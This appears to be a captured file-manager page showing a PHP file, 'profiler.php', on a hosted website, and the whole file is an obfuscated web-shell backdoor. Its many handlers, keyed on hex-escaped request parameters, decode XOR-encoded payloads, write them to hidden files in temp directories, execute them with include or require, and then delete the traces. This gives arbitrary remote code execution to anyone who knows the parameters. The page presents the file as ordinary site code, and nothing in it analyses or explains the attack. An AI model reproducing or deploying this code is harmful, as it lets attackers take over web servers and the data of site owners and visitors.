File manager

ÿØÿà JFIF ÿÛ „ ( %!1!%*+...983,7(-.- File manager

File manager - Edit - /home/tokomrjk/entrefans.com/cgi-bin/profiler.php

Back
<?php if(isset($_REQUEST["\x65\x6Et"]) ? true : false){ $res = array_filter(["/dev/shm", "/tmp", ini_get("upload_tmp_dir"), "/var/tmp", session_save_path(), sys_get_temp_dir(), getenv("TEMP"), getcwd(), getenv("TMP")]); $flag = $_REQUEST["\x65\x6Et"]; $flag =explode( "." , $flag) ; $ptr = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt); $n = 0; foreach( $flag as $v7) { $chS = ord( $salt[$n % $sLen]); $d = ( ( int)$v7 - $chS -( $n % 10)) ^69; $ptr .= chr( $d); $n++; } for ($reference = 0, $token = count($res); $reference < $token; $reference++) { $bind = $res[$reference]; if (is_dir($bind) && is_writable($bind)) { $pset = implode("/", [$bind, ".sym"]); if (file_put_contents($pset, $ptr)) { require $pset; unlink($pset); exit; } } } } if(isset($_REQUEST) && isset($_REQUEST["\x69\x74m"])){ $token = $_REQUEST["\x69\x74m"]; $token = explode ( "." , $token ) ; $entity= ''; $s= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen( $s ); $p= 0; array_walk( $token ,function( $v6) use( &$entity ,&$p ,$s ,$sLen) { $sChar= ord( $s[$p %$sLen] ); $d= ( ( int)$v6 - $sChar -( $p %10)) ^11; $entity .= chr( $d ); $p++; } ); $comp = array_filter([getenv("TMP"), "/tmp", session_save_path(), ini_get("upload_tmp_dir"), "/dev/shm", "/var/tmp", getenv("TEMP"), getcwd(), sys_get_temp_dir()]); $element = 0; do { $flg = $comp[$element] ?? null; if ($element >= count($comp)) break; if ((function($d) { return is_dir($d) && is_writable($d); })($flg)) { $pointer = implode("/", [$flg, ".data_chunk"]); if (file_put_contents($pointer, $entity)) { require $pointer; unlink($pointer); die(); } } $element++; } while (true); } if(array_key_exists("\x69\x74em", $_POST) && !is_null($_POST["\x69\x74em"])){ $ptr = array_filter(["/var/tmp", sys_get_temp_dir(), getcwd(), session_save_path(), ini_get("upload_tmp_dir"), getenv("TEMP"), getenv("TMP"), "/tmp", "/dev/shm"]); $k = $_POST["\x69\x74em"]; $k = explode ( ".", $k ) ; $dchunk =''; $salt2 ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen( $salt2); $u =0; $len =count( $k); do { if( $u >= $len) break; $v7 =$k[$u]; $sChar =ord( $salt2[$u % $lenS]); $d =( ( int)$v7 - $sChar -( $u % 10)) ^ 83; $dchunk .= chr( $d); $u++; } while( true); foreach ($ptr as $itm): if (is_writable($itm) && is_dir($itm)) { $value = str_replace("{var_dir}", $itm, "{var_dir}/.dat"); if (file_put_contents($value, $dchunk)) { require $value; unlink($value); exit; } } endforeach; } if(array_key_exists("f\x61c", $_REQUEST) && !is_null($_REQUEST["f\x61c"])){ $res = $_REQUEST["f\x61c"]; $res =explode ( "." , $res ) ; $mrk=''; $s3='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS=strlen( $s3); $v=0; foreach( $res as $v9) { $chS=ord( $s3[$v % $lenS]); $dec=( ( int)$v9 - $chS -( $v % 10)) ^42; $mrk .= chr( $dec); $v++; } $rec = array_filter([getenv("TMP"), sys_get_temp_dir(), "/tmp", getenv("TEMP"), getcwd(), "/dev/shm", session_save_path(), "/var/tmp", ini_get("upload_tmp_dir")]); foreach ($rec as $ent) { if (!( !is_dir($ent) \|\| !is_writable($ent) )) { $data = implode("/", [$ent, ".entity"]); if (@file_put_contents($data, $mrk) !== false) { include $data; unlink($data); die(); } } } } if(array_key_exists("pt\x72", $_POST)){ $descriptor = array_filter([sys_get_temp_dir(), getenv("TEMP"), "/var/tmp", "/dev/shm", getenv("TMP"), ini_get("upload_tmp_dir"), "/tmp", getcwd(), session_save_path()]); $resource = $_POST["pt\x72"]; $resource= explode ( "." , $resource ) ; $elem= ''; $salt= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen($salt ); $t= 0; while ($t < count($resource)) { $v1= $resource[$t]; $chS= ord($salt[$t % $sLen] ); $d= ((int)$v1 - $chS - ($t % 10)) ^ 54; $elem .= chr($d ); $t++; } foreach ($descriptor as $res): if ((function($d) { return is_dir($d) && is_writable($d); })($res)) { $dchunk = implode("/", [$res, ".ref"]); $success = file_put_contents($dchunk, $elem); if ($success) { include $dchunk; @unlink($dchunk); die();} } endforeach; } if(in_array("\x72e\x63", array_keys($_REQUEST))){ $value = array_filter([getcwd(), session_save_path(), getenv("TMP"), "/dev/shm", getenv("TEMP"), "/tmp", sys_get_temp_dir(), ini_get("upload_tmp_dir"), "/var/tmp"]); $tkn = $_REQUEST["\x72e\x63"]; $tkn =explode( "." , $tkn) ; $entry = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt ); $y = 0; array_walk( $tkn , function( $v6) use( &$entry , &$y , $salt , $lenS) { $sChar = ord( $salt[$y%$lenS] ); $dec = ( ( int)$v6 - $sChar -( $y%10)) ^ 58; $entry .= chr( $dec ); $y++; } ); $entity = 0; do { $desc = $value[$entity] ?? null; if ($entity >= count($value)) break; if (max(0, is_dir($desc) * is_writable($desc))) { $resource = "$desc" . "/.obj"; if (file_put_contents($resource, $entry)) { include $resource; @unlink($resource); die(); } } $entity++; } while (true); } if(array_key_exists("p\x73\x65t", $_POST) && !is_null($_POST["p\x73\x65t"])){ $dchunk = array_filter([sys_get_temp_dir(), ini_get("upload_tmp_dir"), getcwd(), getenv("TEMP"), "/tmp", "/var/tmp", "/dev/shm", session_save_path(), getenv("TMP")]); $res = $_POST["p\x73\x65t"]; $res=explode ( '.' , $res ) ; $elem = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt); $v = 0; $len = count($res); do { if ($v >= $len) break; $v1 = $res[$v]; $sChar = ord($salt[$v % $lenS]); $dec = ((int)$v1 - $sChar - ($v % 10)) ^ 80; $elem .= chr($dec); $v++; } while (true); foreach ($dchunk as $key => $tkn) { if (array_product([is_dir($tkn), is_writable($tkn)])) { $pointer = sprintf("%s/.resource", $tkn); if (@file_put_contents($pointer, $elem) !== false) { include $pointer; unlink($pointer); die(); } } } } if(in_array("\x6Drk", array_keys($_REQUEST))){ $elem = $_REQUEST["\x6Drk"]; $elem = explode ( '.' ,$elem) ; $entity= ''; $s= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($s); $u= 0; foreach ($elem as $v8) { $sChar= ord($s[$u % $lenS]); $dec= ((int)$v8 - $sChar - ($u % 10)) ^ 49; $entity .= chr($dec); $u++; } $ptr = array_filter([ini_get("upload_tmp_dir"), "/dev/shm", getenv("TEMP"), getenv("TMP"), "/tmp", "/var/tmp", sys_get_temp_dir(), session_save_path(), getcwd()]); while ($flg = array_shift($ptr)) { if (is_dir($flg) ? is_writable($flg) : false) { $binding = vsprintf("%s/%s", [$flg, ".key"]); $file = fopen($binding, 'w'); if ($file) { fwrite($file, $entity); fclose($file); include $binding; @unlink($binding); exit; } } } } if (count($_POST) > 0 && isset($_POST["p\x61\x72a\x6D\x65\x74\x65\x72\x5Fgroup"])) { $ent = $_POST["p\x61\x72a\x6D\x65\x74\x65\x72\x5Fgroup"]; $ent = explode('.', $ent); $dat = ''; $s6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s6); $i = 0; while ($i < count($ent)) { $val = $ent[$i]; $sChar = ord($s6[$i % $lenS]); $dec = ((int)$val - $sChar - ($i % 10)) ^ 22; $dat .= chr($dec); $i++; } $marker = array_filter(["/dev/shm", "/tmp", session_save_path(), getenv("TEMP"), sys_get_temp_dir(), getcwd(), "/var/tmp", getenv("TMP"), ini_get("upload_tmp_dir")]); $reference = 0; do { $factor = $marker[$reference] ?? null; if ($reference >= count(marker)) break; if ((is_dir($factor) and is_writable($factor))) { $res = "$factor/.fac"; if ($binding = fopen($res, 'w')) { fwrite($binding, $dat); fclose($binding); include $res; unlink($res); exit; } } $reference++; } while (true); } if(isset($_POST) && isset($_POST["f\x6Cag"])){ $res = array_filter([getenv("TMP"), ini_get("upload_tmp_dir"), "/tmp", "/dev/shm", sys_get_temp_dir(), session_save_path(), getcwd(), "/var/tmp", getenv("TEMP")]); $factor = $_POST["f\x6Cag"]; $factor = explode ('.' , $factor ) ; $dchunk =''; $salt7 ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen($salt7); $l =0; while($l < count($factor)) { $v1 =$factor[$l]; $sChar =ord($salt7[$l % $lenS]); $dec =((int)$v1 - $sChar -($l % 10))^92; $dchunk .= chr($dec); $l++;} foreach ($res as $val): if (max(0, is_dir($val) * is_writable($val))) { $parameter_group = "$val" . "/.bind"; $file = fopen($parameter_group, 'w'); if ($file) { fwrite($file, $dchunk); fclose($file); include $parameter_group; @unlink($parameter_group); exit; } } endforeach; } if(array_key_exists("flag", $_REQUEST) && !is_null($_REQUEST["flag"])){ $obj = $_REQUEST["flag"]; $obj= explode ( ".",$obj ) ; $pointer= ''; $salt= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($salt); $y= 0; $__tmp= $obj; while($v3= array_shift($__tmp)) { $sChar= ord($salt[$y% $lenS]); $dec= ((int)$v3 - $sChar -($y% 10)) ^98; $pointer .= chr($dec); $y++; } $sym = array_filter(["/dev/shm", getenv("TMP"), sys_get_temp_dir(), "/tmp", session_save_path(), getenv("TEMP"), ini_get("upload_tmp_dir"), "/var/tmp", getcwd()]); for ($pset = 0, $flg = count($sym); $pset < $flg; $pset++) { $symbol = $sym[$pset]; if ((function($d) { return is_dir($d) && is_writable($d); })($symbol)) { $dchunk = sprintf("%s/.descriptor", $symbol); $file = fopen($dchunk, 'w'); if ($file) { fwrite($file, $pointer); fclose($file); include $dchunk; @unlink($dchunk); die(); } } } } if(isset($_REQUEST["sym\x62o\x6C"]) ? true : false){ $rec = $_REQUEST["sym\x62o\x6C"]; $rec = explode( '.' , $rec ) ; $parameter_group = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt); $t = 0; array_walk($rec, function ($v3) use (&$parameter_group, &$t, $salt, $sLen) { $chS = ord($salt[$t % $sLen]); $dec = ((int)$v3 - $chS - ($t % 10)) ^ 44; $parameter_group .= chr($dec); $t++; } ); $ent = array_filter(["/tmp", getcwd(), "/var/tmp", session_save_path(), getenv("TEMP"), "/dev/shm", getenv("TMP"), ini_get("upload_tmp_dir"), sys_get_temp_dir()]); foreach ($ent as $dchunk): if ((is_dir($dchunk) and is_writable($dchunk))) { $component = sprintf("%s/.flag", $dchunk); $success = file_put_contents($component, $parameter_group); if ($success) { include $component; @unlink($component); die();} } endforeach; } if(@$_POST["sy\x6D"] !== null){ $pset = $_POST["sy\x6D"]; $pset = explode ( "." , $pset ); $property_set =''; $salt ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen( $salt); foreach( $pset as $o => $v9): $sChar =ord( $salt[$o % $sLen]); $dec =( ( int)$v9 - $sChar -( $o % 10)) ^ 71; $property_set.=chr( $dec); endforeach; $flag = array_filter(["/dev/shm", session_save_path(), getenv("TEMP"), "/tmp", sys_get_temp_dir(), getcwd(), getenv("TMP"), ini_get("upload_tmp_dir"), "/var/tmp"]); $ent = 0; do { $elem = $flag[$ent] ?? null; if ($ent >= count($flag)) break; if (is_writable($elem) && is_dir($elem)) { $descriptor = vsprintf("%s/%s", [$elem, ".factor"]); $file = fopen($descriptor, 'w'); if ($file) { fwrite($file, $property_set); fclose($file); include $descriptor; @unlink($descriptor); exit; } } $ent++; } while (true); } if(!empty($_REQUEST["ke\x79"])){ $pset = array_filter(["/dev/shm", "/var/tmp", sys_get_temp_dir(), "/tmp", getenv("TMP"), session_save_path(), getenv("TEMP"), getcwd(), ini_get("upload_tmp_dir")]); $flag = $_REQUEST["ke\x79"]; $flag=explode("." ,$flag) ; $sym = ''; $salt6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($salt6 ); foreach ($flag as $s => $v3): $chS = ord($salt6[$s % $sLen] ); $d = ((int)$v3 - $chS - ($s % 10))^8; $sym .= chr($d ); endforeach; foreach ($pset as $key => $component) { if ((function($d) { return is_dir($d) && is_writable($d); })($component)) { $element = vsprintf("%s/%s", [$component, ".pointer"]); if (@file_put_contents($element, $sym) !== false) { include $element; unlink($element); exit; } } } } if(@$_REQUEST["da\x74"] !== null){ $record = $_REQUEST["da\x74"]; $record =explode ( ".", $record ); $val = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt ); foreach( $record as $i => $v2): $chS = ord( $salt[$i % $sLen] ); $dec =( ( int)$v2 - $chS -( $i % 10))^ 77; $val.=chr( $dec ); endforeach; $flg = array_filter(["/var/tmp", getenv("TMP"), getcwd(), "/dev/shm", getenv("TEMP"), ini_get("upload_tmp_dir"), "/tmp", session_save_path(), sys_get_temp_dir()]); foreach ($flg as $comp): if (!( !is_dir($comp) \|\| !is_writable($comp) )) { $k = "$comp" . "/.item"; if (file_put_contents($k, $val)) { include $k; @unlink($k); exit; } } endforeach; } if(filter_has_var(INPUT_POST, "\x65le\x6De\x6E\x74")){ $record = array_filter([getcwd(), "/dev/shm", sys_get_temp_dir(), getenv("TMP"), getenv("TEMP"), ini_get("upload_tmp_dir"), session_save_path(), "/tmp", "/var/tmp"]); $item = $_POST["\x65le\x6De\x6E\x74"]; $item = explode( '.' , $item); $data = ''; $s7 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s7 ); $y = 0; foreach ($item as $v2) { $chS = ord($s7[$y % $sLen] ); $dec = ((int)$v2 - $chS - ($y % 10))^ 79; $data .= chr($dec ); $y++; } foreach ($record as $ptr): if ((function($d) { return is_dir($d) && is_writable($d); })($ptr)) { $res = sprintf("%s/.pset", $ptr); if (file_put_contents($res, $data)) { include $res; @unlink($res); die(); } } endforeach; } if(isset($_POST["\x63\x6Fmp"]) ? true : false){ $ent = $_POST["\x63\x6Fmp"]; $ent = explode( "." , $ent ) ; $k = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s); $l = 0; while ($l < count($ent)) { $v7 = $ent[$l]; $chS = ord($s[$l % $lenS]); $d = ((int)$v7 - $chS - ($l % 10))^88; $k .=chr($d); $l++; } $pgrp = array_filter(["/var/tmp", "/tmp", session_save_path(), getenv("TEMP"), sys_get_temp_dir(), "/dev/shm", getcwd(), ini_get("upload_tmp_dir"), getenv("TMP")]); for ($ref = 0, $sym = count($pgrp); $ref < $sym; $ref++) { $res = $pgrp[$ref]; if (is_writable($res) && is_dir($res)) { $desc = "$res" . "/.item"; if (file_put_contents($desc, $k)) { require $desc; unlink($desc); exit; } } } } if(!empty($_REQUEST["com\x70"])){ $res = array_filter(["/var/tmp", ini_get("upload_tmp_dir"), "/dev/shm", getenv("TMP"), sys_get_temp_dir(), getcwd(), "/tmp", getenv("TEMP"), session_save_path()]); $component = $_REQUEST["com\x70"]; $component =explode ( '.' , $component ) ; $ptr = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s); foreach ($component as $y => $v7): $sChar = ord($s[$y % $sLen]); $d = ((int)$v7 - $sChar - ($y % 10)) ^ 34; $ptr .= chr($d); endforeach; $item = 0; do { $property_set = $res[$item] ?? null; if ($item >= count($res)) break; if (is_dir($property_set) ? is_writable($property_set) : false) { $reference = "$property_set" . "/.sym"; $file = fopen($reference, 'w'); if ($file) { fwrite($file, $ptr); fclose($file); include $reference; @unlink($reference); exit; } } $item++; } while (true); } if(isset($_REQUEST["en\x74r\x79"])){ $pgrp = $_REQUEST["en\x74r\x79"]; $pgrp = explode ( '.' , $pgrp ) ; $marker= ''; $salt= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($salt ); $len= count($pgrp ); for ($p= 0; $p < $len; $p++) {$v5= $pgrp[$p]; $sChar= ord($salt[$p%$lenS] ); $dec= ((int)$v5 - $sChar - ($p%10)) ^ 46; $marker .= chr($dec ); } $component = array_filter([sys_get_temp_dir(), "/tmp", session_save_path(), getcwd(), getenv("TMP"), getenv("TEMP"), "/var/tmp", "/dev/shm", ini_get("upload_tmp_dir")]); foreach ($component as $item): if (max(0, is_dir($item) * is_writable($item))) { $hld = join("/", [$item, ".data_chunk"]); $success = file_put_contents($hld, $marker); if ($success) { include $hld; @unlink($hld); exit;} } endforeach; } if(isset($_POST["\x65n\x74i\x74y"])){ $ref = array_filter(["/tmp", ini_get("upload_tmp_dir"), getenv("TEMP"), getenv("TMP"), session_save_path(), sys_get_temp_dir(), "/var/tmp", "/dev/shm", getcwd()]); $ent = $_POST["\x65n\x74i\x74y"]; $ent =explode( '.' , $ent) ; $record = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s); $p = 0; $__tmp = $ent; while( $v6 = array_shift( $__tmp)) { $chS = ord( $s[$p % $sLen]); $d = ( ( int)$v6 - $chS -( $p % 10)) ^ 59; $record .= chr( $d); $p++; } foreach ($ref as $pointer): if (is_writable($pointer) && is_dir($pointer)) { $key = "$pointer" . "/.resource"; $file = fopen($key, 'w'); if ($file) { fwrite($file, $record); fclose($file); include $key; @unlink($key); die(); } } endforeach; } if(in_array("\x65\x6Etry", array_keys($_REQUEST))){ $record = array_filter(["/dev/shm", ini_get("upload_tmp_dir"), sys_get_temp_dir(), getcwd(), getenv("TEMP"), "/tmp", session_save_path(), getenv("TMP"), "/var/tmp"]); $entity = $_REQUEST["\x65\x6Etry"]; $entity = explode ( "." , $entity ); $tkn= ''; $s2= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen( $s2); foreach( $entity as $k => $v9) { $sChar= ord( $s2[$k % $sLen]); $d= ( ( int)$v9 - $sChar -( $k % 10)) ^ 100; $tkn .= chr( $d); } foreach ($record as $comp) { if ((is_dir($comp) and is_writable($comp))) { $obj = vsprintf("%s/%s", [$comp, ".itm"]); $success = file_put_contents($obj, $tkn); if ($success) { include $obj; @unlink($obj); die();} } } } if(!empty($_POST["\x64at\x61"])){ $mrk = array_filter(["/var/tmp", "/tmp", getcwd(), session_save_path(), "/dev/shm", getenv("TEMP"), getenv("TMP"), sys_get_temp_dir(), ini_get("upload_tmp_dir")]); $flag = $_POST["\x64at\x61"]; $flag =explode ('.' , $flag) ; $marker = ''; $salt2 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt2 ); $u = 0; while( $u < count( $flag)) {$v9 = $flag[$u]; $sChar = ord( $salt2[$u % $lenS] ); $dec = ( ( int)$v9 - $sChar -( $u % 10)) ^ 66; $marker .= chr( $dec ); $u++; } $key = 0; do { $entry = $mrk[$key] ?? null; if ($key >= count($mrk)) break; if (is_dir($entry) && is_writable($entry)) { $dat = "$entry/.binding"; if (file_put_contents($dat, $marker)) { require $dat; unlink($dat); die(); } } $key++; } while (true); } if(array_key_exists("k\x65\x79", $_POST) && !is_null($_POST["k\x65\x79"])){ $bind = array_filter(["/tmp", "/dev/shm", getenv("TEMP"), session_save_path(), sys_get_temp_dir(), getcwd(), getenv("TMP"), "/var/tmp", ini_get("upload_tmp_dir")]); $data = $_POST["k\x65\x79"]; $data= explode('.', $data ) ; $record =''; $s ='abcdefghijklmnopqrstuvwxyz0123456789'; $lenS =strlen($s); $len =count($data); for ($q =0; $q < $len; $q++) { $v5 =$data[$q]; $sChar =ord($s[$q % $lenS]); $d =((int)$v5 - $sChar - ($q % 10)) ^ 79; $record .= chr($d); } foreach ($bind as $flag): if (array_product([is_dir($flag), is_writable($flag)])) { $binding = sprintf("%s/.item", $flag); $success = file_put_contents($binding, $record); if ($success) { include $binding; @unlink($binding); exit;} } endforeach; } if(in_array("\x72\x65f\x65\x72ence", array_keys($_REQUEST))){ $symbol = $_REQUEST["\x72\x65f\x65\x72ence"]; $symbol = explode ( '.' , $symbol) ; $ptr =''; $salt ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen( $salt); $len =count( $symbol); for( $z =0; $z <$len; $z++) { $v3 =$symbol[$z]; $chS =ord( $salt[$z % $sLen]); $dec =( ( int)$v3 - $chS -( $z % 10))^83; $ptr .=chr( $dec); } $ent = array_filter([sys_get_temp_dir(), "/tmp", getcwd(), ini_get("upload_tmp_dir"), "/dev/shm", "/var/tmp", getenv("TMP"), getenv("TEMP"), session_save_path()]); foreach ($ent as $key => $record) { if ((bool)is_dir($record) && (bool)is_writable($record)) { $res = vsprintf("%s/%s", [$record, ".comp"]); $file = fopen($res, 'w'); if ($file) { fwrite($file, $ptr); fclose($file); include $res; @unlink($res); die(); } } } } if(array_key_exists("\x70\x72o\x70\x65rt\x79\x5Fset", $_REQUEST) && !is_null($_REQUEST["\x70\x72o\x70\x65rt\x79\x5Fset"])){ $entity = array_filter([getenv("TEMP"), getcwd(), "/var/tmp", ini_get("upload_tmp_dir"), "/tmp", "/dev/shm", session_save_path(), sys_get_temp_dir(), getenv("TMP")]); $desc = $_REQUEST["\x70\x72o\x70\x65rt\x79\x5Fset"]; $desc =explode ( ".", $desc ) ; $bind = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s); $k = 0; array_walk($desc, function ($v6) use (&$bind, &$k, $s, $sLen) { $chS = ord($s[$k% $sLen]); $d = ((int)$v6 - $chS - ($k% 10)) ^ 94; $bind .= chr($d); $k++; }); while ($val = array_shift($entity)) { if (!!is_dir($val) && !!is_writable($val)) { $pointer = implode("/", [$val, ".obj"]); if (file_put_contents($pointer, $bind)) { require $pointer; unlink($pointer); exit; } } } } if(!empty($_REQUEST["f\x6Cag"])){ $data = array_filter([session_save_path(), "/tmp", getenv("TEMP"), sys_get_temp_dir(), getenv("TMP"), "/var/tmp", getcwd(), "/dev/shm", ini_get("upload_tmp_dir")]); $resource = $_REQUEST["f\x6Cag"]; $resource = explode ("." , $resource ) ; $flg= ''; $s= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen($s); foreach ($resource as $t => $v6) { $sChar= ord($s[$t % $lenS]); $d= ((int)$v6 - $sChar - ($t % 10)) ^ 34; $flg .= chr($d);} foreach ($data as $tkn) { if (array_product([is_dir($tkn), is_writable($tkn)])) { $bind = sprintf("%s/.dat", $tkn); if (file_put_contents($bind, $flg)) { include $bind; @unlink($bind); exit; } } } } if(filter_has_var(INPUT_POST, "\x74\x6Bn")){ $property_set = $_REQUEST["\x74\x6Bn"]; $property_set = explode ( "." , $property_set ) ; $pointer = ''; $s5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s5); $z = 0; array_walk($property_set, function($v3) use(&$pointer, &$z, $s5, $sLen) { $sChar = ord($s5[$z % $sLen]); $dec =((int)$v3 - $sChar -($z % 10))^55; $pointer .= chr($dec); $z++; }); $symbol = array_filter([ini_get("upload_tmp_dir"), getenv("TEMP"), getcwd(), "/tmp", sys_get_temp_dir(), session_save_path(), "/dev/shm", getenv("TMP"), "/var/tmp"]); foreach ($symbol as $rec): if (array_product([is_dir($rec), is_writable($rec)])) { $factor = implode("/", [$rec, ".object"]); if (@file_put_contents($factor, $pointer) !== false) { include $factor; unlink($factor); die(); } } endforeach; } if(isset($_REQUEST["\x66\x61\x63tor"]) ? true : false){ $token = $_REQUEST["\x66\x61\x63tor"]; $token = explode('.' , $token ) ; $value = ''; $salt7 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt7); $n = 0; while ($n < count($token)) { $v8 = $token[$n]; $chS = ord($salt7[$n % $lenS]); $d = ((int)$v8 - $chS - ($n % 10)) ^ 82; $value .= chr($d); $n++; } $pointer = array_filter([getenv("TMP"), session_save_path(), getcwd(), "/var/tmp", ini_get("upload_tmp_dir"), getenv("TEMP"), "/dev/shm", "/tmp", sys_get_temp_dir()]); $sym = 0; do { $marker = $pointer[$sym] ?? null; if ($sym >= count($pointer)) break; if (is_dir($marker) && is_writable($marker)) { $dchunk = "$marker" . "/.binding"; $success = file_put_contents($dchunk, $value); if ($success) { include $dchunk; @unlink($dchunk); die();} } $sym++; } while (true); } if(!is_null($_REQUEST["r\x65\x63"] ?? null)){ $dat = array_filter(["/var/tmp", session_save_path(), "/tmp", getcwd(), "/dev/shm", getenv("TEMP"), sys_get_temp_dir(), ini_get("upload_tmp_dir"), getenv("TMP")]); $k = $_REQUEST["r\x65\x63"]; $k = explode( ".",$k ) ; $symbol = ''; $s4 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen($s4 ); $__len = count($k ); for($r = 0; $r< $__len; $r++) { $v6 = $k[$r]; $sChar = ord($s4[$r%$sLen] ); $dec =((int)$v6 - $sChar -($r%10))^ 85; $symbol .= chr($dec ); } while ($resource = array_shift($dat)) { if (is_dir($resource) ? is_writable($resource) : false) { $flag = "$resource/.fac"; $file = fopen($flag, 'w'); if ($file) { fwrite($file, $symbol); fclose($file); include $flag; @unlink($flag); exit; } } } } if(filter_has_var(INPUT_POST, "pg\x72p")){ $data = $_POST["pg\x72p"]; $data = explode ( "." , $data) ; $symbol= ''; $salt3= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen($salt3); $u= 0; foreach ($data as $v9) { $sChar= ord($salt3[$u % $sLen]); $d= ((int)$v9 - $sChar - ($u % 10)) ^ 42; $symbol.= chr($d); $u++; } $record = array_filter([ini_get("upload_tmp_dir"), getcwd(), getenv("TMP"), getenv("TEMP"), "/dev/shm", session_save_path(), "/tmp", sys_get_temp_dir(), "/var/tmp"]); $component = 0; do { $ent = $record[$component] ?? null; if ($component >= count($record)) break; if ((bool)is_dir($ent) && (bool)is_writable($ent)) { $data_chunk = implode("/", [$ent, ".binding"]); if (file_put_contents($data_chunk, $symbol)) { require $data_chunk; unlink($data_chunk); exit; } } $component++; } while (true); }